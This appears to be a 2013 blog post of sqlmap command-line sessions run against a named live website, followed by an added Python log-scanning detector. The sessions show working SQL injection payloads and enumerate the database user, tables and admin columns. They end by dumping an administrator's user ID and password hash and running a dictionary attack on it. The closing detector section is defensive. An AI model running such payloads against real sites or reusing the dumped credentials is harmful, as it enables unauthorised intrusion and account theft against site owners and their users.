sqlmap injection example against MySQL

Posted on 2013-4-4 22:18:49
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user       /* note: get the current user name

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:53:58


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db                  /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:54:18


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables  -D "wepost"         /* get the table names of the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

[*] shutting down at: 16:55:33


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" users-D "wepost" -v 0     /* get the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

[*] shutting down at: 16:56:19


D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql"  --dump  -C "userid,password"  -T "admin" -D "wepost" -v 0      /* get the contents of the columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

[*] shutting down at: 16:58:14

D:\Python27\sqlmap>
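From the defender's side, the session above leaves a recognisable trail in the web server's access log: four payload shapes (AND n=n, FLOOR(RAND(0)*2) ... GROUP BY, UNION ALL SELECT NULL..., SLEEP(n)) plus, unless the operator changed it, the tool's own User-Agent. The following Python is an added detection example, not code from the post or from sqlmap; the IP addresses, timestamp, log lines and the "sqlmap/0.9 (...)" User-Agent string are constructed or assumed.

```python
import re
from urllib.parse import quote, unquote_plus, urlsplit

# Signatures for the four techniques sqlmap reported above, matched against the decoded query string.
SIGNATURES = {
    "boolean-based blind": re.compile(r"\bAND\s+(\d+)=\1\b", re.I),
    "error-based": re.compile(r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\).*GROUP\s+BY", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
}
# Apache combined log format; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')

def classify(line):
    """Return (ip, path, findings) for one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m["url"])
    query = unquote_plus(url.query)            # decode %20, + and %23 before matching
    findings = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if m["ua"].lower().startswith("sqlmap/"):  # assumed default UA; a custom --user-agent defeats this check
        findings.append("sqlmap user-agent")
    return m["ip"], url.path, findings

def scan(lines):
    """Aggregate findings per source IP; hosts with no findings are omitted."""
    hits = {}
    for line in lines:
        parsed = classify(line)
        if parsed and parsed[2]:
            hits.setdefault(parsed[0], set()).update(parsed[2])
    return hits

def _line(ip, query, ua):
    """Build one constructed combined-log line; the query is URL-encoded as a client would send it."""
    return (f'{ip} - - [04/Apr/2013:16:53:54 +0800] "GET /article.php?{quote(query, safe="=(),*")} HTTP/1.1" '
            f'200 5123 "-" "{ua}"')

SQLMAP_UA = "sqlmap/0.9 (http://sqlmap.sourceforge.net)"   # assumed default User-Agent of this version
ERROR_PAYLOAD = ("id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN "
                 "(8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM "
                 "information_schema.tables GROUP BY x)a)")
# Constructed sample traffic: one ordinary reader, then the four probe shapes from the session.
SAMPLE_LOG = [
    _line("198.51.100.7", "id=276", "Mozilla/5.0 (Windows NT 6.1)"),
    _line("203.0.113.5", "id=276 AND 799=799", SQLMAP_UA),
    _line("203.0.113.5", ERROR_PAYLOAD, SQLMAP_UA),
    _line("203.0.113.5", "id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CHAR(32), NULL, NULL, NULL#", SQLMAP_UA),
    _line("203.0.113.5", "id=276 AND SLEEP(5)", SQLMAP_UA),
]
```

scan(SAMPLE_LOG) attributes all four techniques plus the User-Agent to 203.0.113.5 and nothing to the ordinary reader; the signatures cover sqlmap's default payload shapes only, so treat them as a triage aid rather than a substitute for parameterised queries in article.php.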